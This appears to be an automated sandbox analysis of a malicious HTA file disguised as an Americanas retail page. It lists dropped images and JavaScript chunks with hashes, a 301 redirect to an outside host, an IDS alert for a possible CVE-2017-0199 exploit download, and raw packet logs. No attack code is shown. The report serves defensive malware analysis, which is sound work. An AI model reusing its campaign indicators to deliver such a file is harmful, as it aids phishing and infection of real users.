                                                                                                                                                                                                                            Preview:.PNG........IHDR.......9.....=G......pHYs............... .IDATx..m.$Wy..{NfV.}...BH-@-lK.c..4~a#F-l....0l...a@....e^f......_v.`k....<....f$.7..].6f...a0......$...v.z.<g?...........q..2.y.sN..<....<...j..c....Fb..4&.=.OQ....E.Q.q>].-a..".'.I..b.:..ov.E.5}....l-.ef..5...td.....}.|../..#....u....z..2...j.}.....x..MO*.-.......6.T.YP9.....&.G.*y..1.o.Z..v.;?..U.<..r.Ds..&.,.=..JKYG...u..u.a2j=..g.E..v.FZ...W.G....fv?)s.H_,z=..Y.TiD.....J....j.z....#U.H.<..T..e....Ni..`...W.,Rp.$\.hJ..$....x..P.u..3I.E.k.>.u_Xc...+.|;...k..~P..U.o.e..e...F....E.y..].....$O/-~l..PD.<].......,.-"..O...~.....Pi'gU"...N..Y.}....pE.._D..Mf.\.$R..P..L.M<...Y.Kk.^.Ut..Zo..'..n....u*......k...@../[.S.Uy......YX......E.."y..{.z7-.nE.W.../e>.1...Qz..q...y(..U5....x.Ey..h...D1E...s..^.u\.y...t1S.$&k]...J....K}.q..x..$..F3+?....0.5.Z.tB..k........ZN.iQ..T..4V[E...=.^....{.*<...-V....I.<ON..YZ.*.&.U.me..Z.$L!..V+..:.o=6..:uov5.h.r.'.zS.i.....W........<{./k9.....
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:PNG image data, 250 x 260, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):5854
                                                                                                                                                                                                                            Entropy (8bit):7.901948181603355
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:RSjPX8+VKezzzLAREPNMNq4KJCdAg5zHXsoV7WHi2eRZ3nHh/SLBQ7zwRDJxMysl:RSjf8+VUisvECdvtWHiLfZSd+8no9V
                                                                                                                                                                                                                            MD5:7E40D9EA5E05662F8CC9B805AA313AA9
                                                                                                                                                                                                                            SHA1:CAC32FCA85437248C7B5F3FBB26A8E7BC5B56AB8
                                                                                                                                                                                                                            SHA-256:F1DBC816B9FD576E3726CE5A10469D3760DD7328D63DA36D7F86E237A9A45EA9
                                                                                                                                                                                                                            SHA-512:ECEDA18809D84D6E9CD672BD54885BE3A3D3805F07908D37C00A693EE3A383B8F44F739203ADCA39D830137FE88CB82D1D7AD7D953F2E134C40D0DAC412ACE4C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.PNG........IHDR...............).....pHYs.................IDATx...]l..a.....w..lZ...-Gn.a.I..Q......[..d ...J.".1.h......ABaQ.l...h+(..F.>.E.....".1).....N:.G.vw.p<."o.v.v.k.?@0.....3;;;.........................T..?L.0..H..-.LH .;...%[.'.... /j...m....it.*i...3...-!..L.a...D.....f.~S.=..I.k?..`..=,. -..l..7,....2.....2.r..M@...d.f.6..u&...@;&.q..&..k....|]....c.L..'..=.u.z..\N..Nt.y.ko........s.Dl...X..r.M.....1<......H......A.....Z..R..`.6....A@.]..x.;.=..... ...7"W..... ..6.1|F..~.HQ.D0.._;.-..9...p........1.D..+.5_./a....(..8...Wk.OMA_.4......$0Zk.....p..........#..x.6.).a..[hDu#...5.eP.....7......'..T".:{...z..w....bp..Kn7r.t_m..=...J...O;..U...d'.....U..8.y...Mv.&!.n..q.t_..<.t..!...X..d....FgmN.|....Q..FgmN....Ukt..D.K..eh...W5..8.K..(.......b.W.H.H.V$"..H.HVzG...|2.......Jo..t......Q.dq.B[.A_m.......O..J.w...l7"..#.-i..m.5..m~"j...v.U.F..m'j!..6.e..z}.%.Z..b...l.......aBs.t..v.V$.0T......3.57.l)..A...>'jA.5n.........S..........I..2.DmD..:.
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:PNG image data, 250 x 260, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):20554
                                                                                                                                                                                                                            Entropy (8bit):7.982094652208921
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:4DcejaqliCkGTnjmi8xPf4/20axacg6NUHKOcYuycaV7S733E/Ro/LU4vI:7Dhimw/PadgHKOcYZV8nSWhvI
                                                                                                                                                                                                                            MD5:85153A9FD2A9EC151100DB6EF3F37538
                                                                                                                                                                                                                            SHA1:F7A11DE9353C98C102AB552782DBB6E85154A254
                                                                                                                                                                                                                            SHA-256:CAA105F646916CDA3C4284F6491BBE9616D7F333AF5B4C2E6BA759A155B6EB77
                                                                                                                                                                                                                            SHA-512:9985BFA5D8017A3B1D3BE2C996A6698819E79D19827562A27E81E5A4AAA4C7C429232E30934659F885E481C0883B72516CB60366507A756DC81A928C00E0B8E0
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.PNG........IHDR...............).....pHYs............... .IDATx..y...y..U.=..W+..I..n.C`c.8.....'..8.c'.q.8...q....c..;.....`.1..!.!$...V....tW...kg.!.....3.2..].SO.U...oA..1b..#F..1b..#F..1b..#F..1b..#F..1b.1. ^.......Y.8.4..).....0....^...D0t!L.1.....1a.F...gt=..n.H8....s...J.z.+..#.Y...e1bTB..U..1@.=.]..o<...B....g...*........a...fM.y...#.p.T..-4...`....U....`._2.?..%8W..W.X...9".%....1.c...J....D.F..Z.G..../:..lZ....9m.|0....wd...?F.............\.}.J..).....Q.>......([w.D.1.1.....a$..;...`.F.....Z?....0._...1.0.......t..x_.....MY.5Z...y..1.-.1.7$>........7.w.r^.q..b..F.........!..g.'.~\.^`.U ...i..2F..e(.E..Q...k..*...u.]}....M:...1.d.. L......O...S{.g..Fpu..M.5..c,...)6|.X...........1bLPh*Hn$.......}.X].X.<k.7......z..cG.^$...P.j..>...z.W9j..v.~.>./8|.;.b......~..td?... +.9....cdH....z.UG.{....\....&Dl.c.8^...4..s..OU/,1........@4.D.....Dt..t..n...G|..r...N)dL..1.3..6.K...9E..;.V.qe.#&...3....5F....;/...SG.^?"..9.r...n.+..
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (23795)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):23885
                                                                                                                                                                                                                            Entropy (8bit):5.252757997314533
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:hHwxKC+QrwxKCpC13RQwxKC+O5b4NBOlgpEluE/7jAF+/fjfMSRNgFA2:S3RT6OlxB7UufjfMcgFA2
                                                                                                                                                                                                                            MD5:C45F83F1265DAEF65E56C045188B74CA
                                                                                                                                                                                                                            SHA1:9AFDF2480B43511C16FF1B9404C14050A9F8B338
                                                                                                                                                                                                                            SHA-256:9BC48DD79AF31E65C5BB78352BD99651F2DA6E21365424E2EB9F8D72A741A0D8
                                                                                                                                                                                                                            SHA-512:1C1E5A0A210B232196464008048464EED79C05DB607D9B7406B7340347F29867FD2ACD1483CA9188A289F9CAE21F9B66958E008CDBF04454A7ED9A96C1663340
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[2941,9056,2256],{25051:e=>{var n={kind:"Document",definitions:[{kind:"OperationDefinition",operation:"query",name:{kind:"Name",value:"PageFromCache"},variableDefinitions:[{kind:"VariableDefinition",variable:{kind:"Variable",name:{kind:"Name",value:"path"}},type:{kind:"NamedType",name:{kind:"Name",value:"String"}},directives:[]},{kind:"VariableDefinition",variable:{kind:"Variable",name:{kind:"Name",value:"area"}},type:{kind:"NamedType",name:{kind:"Name",value:"String"}},directives:[]}],directives:[],selectionSet:{kind:"SelectionSet",selections:[{kind:"Field",name:{kind:"Name",value:"page"},arguments:[{kind:"Argument",name:{kind:"Name",value:"path"},value:{kind:"Variable",name:{kind:"Name",value:"path"}}}],directives:[],selectionSet:{kind:"SelectionSet",selections:[{kind:"Field",name:{kind:"Name",value:"components"},arguments:[],directives:[]},{kind:"Field",name:{kind:"Name",value:"template"},arguments:[],direct
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2261)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2353
                                                                                                                                                                                                                            Entropy (8bit):5.448764768129052
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:ciq0LYM5tgKIXBb6//dYuQR/UbDZIweqbDQrEkIeKpY7vhjRIovV8UWfmFp966Ry:XEMBBA/eIw01hjH8BmFp9Yka75xe+fjr
                                                                                                                                                                                                                            MD5:0BC0C33CF0F691D7D609885C8EBC555A
                                                                                                                                                                                                                            SHA1:58F53A88A4847BB490F9F8E973469725A783C3EB
                                                                                                                                                                                                                            SHA-256:D61D32EA479952154FE6C772E076C792BB61FF26E7B7E4EA7C73D1D7BD727DD5
                                                                                                                                                                                                                            SHA-512:B56AB9AF223803C870A6290263FF32ED8A54B8602FE98D7ED58072C6C1B3DEB3B69F1A2D7B00020884DA6864DC3ABF6751780F9E4725D45C6041A93851BE0914
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:"use strict";(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[703],{78748:(t,e,i)=>{i.r(e),i.d(e,{default:()=>x});var n,r,o=i(47169),a=i(8821),l=i(85169),s=i(82248),c=i(46647),p=i(32735),d=i(56875),f=p.createElement,g=function(t){(0,s.Z)(i,t);var e=(0,c.Z)(i);function i(){return(0,a.Z)(this,i),e.apply(this,arguments)}return(0,l.Z)(i,[{key:"render",value:function(){var t=this,e=this.props.publication,i=e.titleBanner,n=e.titleAlign,r=e.bgColor,o=void 0===r?null:r,a=e.titlePosition,l=e.children,s=e.borderLess;if(!l)return!1;var c=a&&"Footer"===a;return f(u,{bgColor:o},f(m,{borderLess:s},i&&!c&&f(h,{titleAlign:n},f(q,{className:"panel-title",titleAlign:n},i)),l.map((function(e){return f("div",{key:e._id},t.props.renderComponent(e))})),i&&c&&f(C,{titleAlign:n},f(q,{className:"panel-title",titleAlign:n},i))))}}]),i}(p.Component),u=d.ZP.div.withConfig({displayName:"src__Wrapper",componentId:"sc-1qaorq1-0"})(["",";"],(function(t){var e=t.bgColor;return e&&"backgroun
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (13201)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):13313
                                                                                                                                                                                                                            Entropy (8bit):5.298226828350203
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:RvpwJV6OJ9hFrsE0Q/GFdvwJV6Oa4hFrsE0LVz0NP+SFSnnxDpr71q1jHBQEhqg+:RhwV9Y8IvwhYPl0NyI19ggzCIC8tgr
                                                                                                                                                                                                                            MD5:6F89F8B17509A037FCC31B1DD3B99499
                                                                                                                                                                                                                            SHA1:6FBCCB7CDC6AB820F1227741D144CB07E457266A
                                                                                                                                                                                                                            SHA-256:6459B4DBA7698D1D74AF0CF9DEF5E28BE6CD57E8B21B2279F91E4B4103F74A29
                                                                                                                                                                                                                            SHA-512:DED0ABDD0EBC7B105F54D84311636156734AC5AAAD5AB5E245B062798E71CD15F1BF1122D058F5F8C7EF9F78BFBDF086C8F2C0ECE606F51BD3E8F17A487D2526
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[5645],{85207:e=>{var n={kind:"Document",definitions:[{kind:"OperationDefinition",operation:"query",name:{kind:"Name",value:"CookieHeaders"},variableDefinitions:[],directives:[],selectionSet:{kind:"SelectionSet",selections:[{kind:"Field",name:{kind:"Name",value:"cookies"},arguments:[],directives:[]},{kind:"Field",name:{kind:"Name",value:"headers"},arguments:[],directives:[]}]}}],loc:{start:0,end:44}};n.loc.source={body:"query CookieHeaders {\n cookies\n headers\n}\n",name:"GraphQL request",locationOffset:{line:1,column:1}};var t={};function i(e,n){for(var t=0;t<e.definitions.length;t++){var i=e.definitions[t];if(i.name&&i.name.value==n)return i}}n.definitions.forEach((function(e){if(e.name){var n=new Set;!function e(n,t){if("FragmentSpread"===n.kind)t.add(n.name.value);else if("VariableDefinition"===n.kind){var i=n.type;"NamedType"===i.kind&&t.add(i.name.value)}n.selectionSet&&n.selectionSet.selections.forEac
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (5939)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):6033
                                                                                                                                                                                                                            Entropy (8bit):5.480942188804171
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:ndfmCzL5yEifbddhECXsfLW1UJeFyB75iJWn/hEV/me1ksrfF7BoQQGkbq7a:ndfmCzL5tiTddWCXsfLW1UEoB3EVM0f2
                                                                                                                                                                                                                            MD5:9F0E2F23F8E77696032795CBECCDC012
                                                                                                                                                                                                                            SHA1:E6A4D1FCED1C4599B0AC3699EF5342239A63B786
                                                                                                                                                                                                                            SHA-256:7B0D5B9C0CB2A660345E621A21628D357EACE9B13D37B6606235A81422381FCC
                                                                                                                                                                                                                            SHA-512:9894E933F10CCC9509485F23CD0581151717233A08EBEE8CB6000299B265F4D759532A26E05AF26D94CDAC303DB001559E91C29E48405EBD2DA2ECEB118C5DBE
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:"use strict";(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[2205],{3337:(r,t,a)=>{a.r(t),a.d(t,{acomTheme:()=>x,default:()=>p});var l=a(20011),i=a(37755),e=a(32735),o=a(22538),d=a(89504),s=a(21277),F=a.n(s),g=a(56875),h=a(38664),C=e.createElement,x=(0,i.Z)((0,i.Z)((0,i.Z)({},h.O9),h.Dx),{},{mainColors:h.nA,supportColors:h.eP,baselineColors:h.KR,systemColors:h.EU,complementaryColors:h.Ej,ameColors:h.Yj,typography:h.cp,fontFamily:"Helvetica,Arial,sans-serif;",shadow:{floatBasket:"0 0 12px 0 rgba(0,0,0,0.25)",box:"0 6px 20px -1px rgba(0,0,0,0.08);"},border:"1px solid #CCCCCC"});const p=(0,o.EN)((function(r){var t,a=function(r){var t,a=(0,d.useQuery)(F(),{variables:{path:null===r||void 0===r?void 0:r.pathname},fetchPolicy:"cache-only"}).data,l="texto claro"===(null===a||void 0===a||null===(t=a.skin)||void 0===t?void 0:t.textLight)?"#fff":null;return(0,i.Z)((0,i.Z)({},null===a||void 0===a?void 0:a.skin),{},{fontColor:l})}(null===(t=r.history)||void 0===t?void 0
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:PNG image data, 1296 x 324, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):262851
                                                                                                                                                                                                                            Entropy (8bit):7.996424490052967
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:6144:0PAKyLKGJ7b+cdyaXFIXvZRYFy7qd4czOXdy2wB:kXy+OFVXFe+FjdsXd9U
                                                                                                                                                                                                                            MD5:A367BF1879B82AED03ECFB1698095843
                                                                                                                                                                                                                            SHA1:255FE9100F9524BBFA9B4796CBB6AA1A48D03775
                                                                                                                                                                                                                            SHA-256:C637035554FC2485C53C7428D254C78E8AEA0854E0062C7EDD8218F47EB887A3
                                                                                                                                                                                                                            SHA-512:E6BD635C3FDA03AEF5E2B74629F7A92E98BBF24F3E4CDC821E52F52A9C5DF3C12D177A45237F2385CBD6F717A1DC03DD1B2FFBD495B711BC4AFB562C83EE8818
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.PNG........IHDR.......D....._..v....pHYs............... .IDATx..I.$[r..7;.q...M5>v.#....PS.6..hX.Z......z'}..k'}.-.h.E.F. ...").."..d.c..W./.;D......1...o.73....~.;.{....._.~!p!......s....$ .2.e.@.0...E...bu"ph....F....+.+}Ph7...C ..L.a0W.o$.....H.P. ?F ....3..:a...I.4.....1....@.@..7.bm&.m..n..I..2..i........T......',T......>.(...8. ..WY.`4.f..Y=....5.j.]].*.;......K......H...$..3.........u~..].z.dh9k...C..G9..,u~..*......e;T.-S-..:..}$#..........-0.y........o*^O.l.x..a{.k....6rhNd.|X.m..%yx.....+.B....F....S..|....?,...;.$....M..<.q..f\n.....z:.....vms..9T..~5o.gS.....3k~2.J..c..........o.r~..y.o....>..e.gy......r..v..u.$<..rm..5..H.o).B....C..a=_.\ y....k..^{.{.t0...A.3..=r...V..Z....x.........(.u.`.3....7...].V7P@ .A.....Y.......D.U. Y@g.0..!.+b?.#(.>Q.J.H..>Kf.tM....FBX..<.= .b.w.<...xA..g....N..{..{....d/..8..!.. a.~.A......A...<H...*..A....zP....lc2.W....AB...v..b..7.?*..m..R....![|....cF.....kY/!..P.........S.7..o\.a.......Y=...
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):357
                                                                                                                                                                                                                            Entropy (8bit):5.209832565354849
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:pn0+Dy9xwol6hEr6VX16hu9nPtrLFwWtHGQcXnMKR+knLFwWtHGQcXNKzm8oD:J0+ox0RJWWPD9Qp0qp92Qm8+
                                                                                                                                                                                                                            MD5:8D156A3026840157CA292D51F52152BC
                                                                                                                                                                                                                            SHA1:6314B3E015735F52A605CA45608CD14F95FEF6A0
                                                                                                                                                                                                                            SHA-256:CA74AE119560729490CBA0ECEE5FD787F05ACACFDC56E675C262A77DD827263C
                                                                                                                                                                                                                            SHA-512:A4B7308A1DED43C6BBDB54DA93A850CF0590E9170827ED7AD968490AE9FC46114BB5CFEB081AFB901BBD1AF6257D7DE4A98638995DC6E0D67E781D37BC7C1EB0
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="https://102.57.205.92.host.secureserver.net/g1/">here</a>.</p>.<hr>.<address>Apache/2.4.41 (Ubuntu) Server at 102.57.205.92.host.secureserver.net Port 443</address>.</body></html>.
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):13436
                                                                                                                                                                                                                            Entropy (8bit):7.968304492096957
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:zgGUqL5yr7qJlbNzAjBorb3stbgqjqEggHMN3X1zPMlg5B:8GUqwrOJ9NMjGrb3qV2EgNNn5PG
                                                                                                                                                                                                                            MD5:5D9F3BB3F4F63C6E7F0BC766B0BEFE4F
                                                                                                                                                                                                                            SHA1:9E69111C3C65BAF526374F5CB57C153628CB4528
                                                                                                                                                                                                                            SHA-256:E1CA1B64DC6BF286D0347A0BBD0D967BB92EB7647107936899BEE29DE202D58D
                                                                                                                                                                                                                            SHA-512:26C582C01DA8C098AFA7869FA8235C5876ACD4D52045035780CC3560B59AFFF5F69A92E849660B7065D384BD3D8A80E3F6AFAF0622292FD853FCAF760D0D5406
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:RIFFt4..WEBPVP8X...........5..ALPH..........(m.....,...O..5..._..VP8 p3...u...*..6....%7p.X...........J.b.....mH.S...g...........>.+.7.?._....|..................;.......?....p..?......3...?.x.F.......A.........O..=............_......o..._...?.?..?....*...................~............?....._.g.?%.1.r.......~ {..3........}................................!.C...O..Q...'.......}......._......D.....O......_...?..........O..e.Q.....c.O....................w.............t.....?....._....c........G...g.G..z.'.6..6..6..6..6..6..6..6..6..6..6..6..6....6.....Jn.x.t.G...C..Q.?|....\b)n4.>.e?'...j!.$..g$T~).%.C...(..l...`.?.r7._.`T....<.\..o5....@j....jm........w.\#..{.;.iN.D&....1X.....j.-21....+..rQ...8^h.....h.Y....yY..7.[.4.....4.s..F.O\.r..T.O.&@..R..=d|.p.4......MW......m..m..m..m..m...>O...0.....>...v^.-.$....v..I..}...4U.c.^.^X.B...0.B..O....0.n....10...J...._.Pm._.v.La.....Y.`....>...k.\.............{.E..x...t...".=nC.O.D0d2.x..v...'.6..6..6..6..6..6
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 36 x 38
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1062
                                                                                                                                                                                                                            Entropy (8bit):4.517838839626174
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:z4ENetWsdvCMtkEFk+t2cd3ikIbOViGZVsMLfE4DMWUcC/GFvyVEZd6vcmadxVtS:nA/ag/QSi6/LKZzqKVQgJOexQkYfG6E
                                                                                                                                                                                                                            MD5:124A9E7B6976F7570134B7034EE28D2B
                                                                                                                                                                                                                            SHA1:E889BFC2A2E57491016B05DB966FC6297A174F55
                                                                                                                                                                                                                            SHA-256:5F95EFF2BCAAEA82D0AE34A007DE3595C0D830AC4810EA4854E6526E261108E9
                                                                                                                                                                                                                            SHA-512:EA1B3CC56BD41FC534AAC00F186180345CB2C06705B57C88C8A6953E6CE8B9A2E3809DDB01DAAC66FA9C424D517D2D14FA45FBEF9D74FEF8A809B71550C7C145
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:GIF89a$.&.......h...............h.hh..h..h..h..h....h................h.................h.................h................hh.h..h..h..h..h.hhhhh.hh.hh.hh.hh..hh.h..h..h.h..h..hh.h..h..h..h..h..hh.h..h..h..h..h..hh.h..h..h..h..h...h...............h.hh..h..h..h..h....h...............h................h...........h.................h...............h.hh..h..h..h..h....h................h.................h.................h.................h..............h.hh.h..h..h..h....h..............h................h................h................h...............h.hh..h..h..h..h....h................h.................h.................h......................................................................................................................................!.......,....$.&.@......H.......<0.....VXQH..C..1>.(..@..C.t.q"B..S.\.r.D...Z.. .M.41.".......<.r.;.r4..P..]....+.T-...N...x....1.:..TdD...^.j..W.r...y....V...Lx0..):8p q.4.;...f`.r-K...(..P....t.].~..l..
                                                                                                                                                                                                                            File type:HTML document, Unicode text, UTF-8 text, with very long lines (1835)
                                                                                                                                                                                                                            Entropy (8bit):5.614851252612375
                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                              File name:Archivo-PxFkiLTWYG-23122024095010.hta
                                                                                                                                                                                                                              File size:442'101 bytes
                                                                                                                                                                                                                              MD5:74903ec7a266a9d8d2c5d96d8b9b4965
                                                                                                                                                                                                                              SHA1:c425469eaa1d275f7a30314298a665fc553d5b33
                                                                                                                                                                                                                              SHA256:78df7fdcf6d5a0e70aee7d295f976dabb99c5dd1327fcb82fea548e578897f78
                                                                                                                                                                                                                              SHA512:dbab53d93608b8c5d05fe32c9387396006552ed328e83908b886d921e59a69074b4ae8cbe3d80ab93b50e65a7c1ed087645b58f26a5f5c38514d6b051c72b34e
                                                                                                                                                                                                                              SSDEEP:3072:0Al6oGlpW5P1VZuSLWlUmHpyqOOEgGmlO1gE8MCRCU65ZRoWqfx:ll6vpW59VISL+RZZrlOu
                                                                                                                                                                                                                              TLSH:D194F8361698297E434743CDBC5BBB1662CB605BC5894AE8CAFCCF1E87A9CDE131160D
                                                                                                                                                                                                                              File Content Preview:... <!DOCTYPE html>. <html lang="pt-BR">. <head>. <title data-react-helmet="true">Americanas - Passou, cestou :)</title>. <meta http-equiv="X-UA-Compatible" content="IE=edge" /> . <meta name="viewport" content="width=device-width, initial-scal
                                                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                              2024-12-23T10:34:00.362497+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.64983216.12.1.68443TCP
                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                              Dec 23, 2024 10:33:34.827788115 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:34.827828884 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:34.828150034 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:34.828438044 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:34.828455925 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:36.523050070 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:36.523180962 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:36.729036093 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:36.729067087 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:36.729357004 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:36.729412079 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:36.769747972 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:36.811340094 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.393527031 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.393564939 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.393619061 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.393637896 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.393670082 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.393711090 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.393721104 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.393758059 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.401860952 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.403006077 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.406836033 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.409532070 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.409543991 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.409588099 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.413081884 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.413125992 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.420737028 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.421562910 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.425561905 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.427723885 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.513037920 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.513127089 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.513139009 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.513196945 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.580024004 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.580482960 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.585534096 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.585577965 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.589694977 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.589741945 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.590859890 CET44349743172.217.19.194192.168.2.6
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.590909004 CET49743443192.168.2.6172.217.19.194
                                                                                                                                                                                                                              Dec 23, 2024 10:33:37.598314047 CET44349743172.217.19.194192.168.2.6
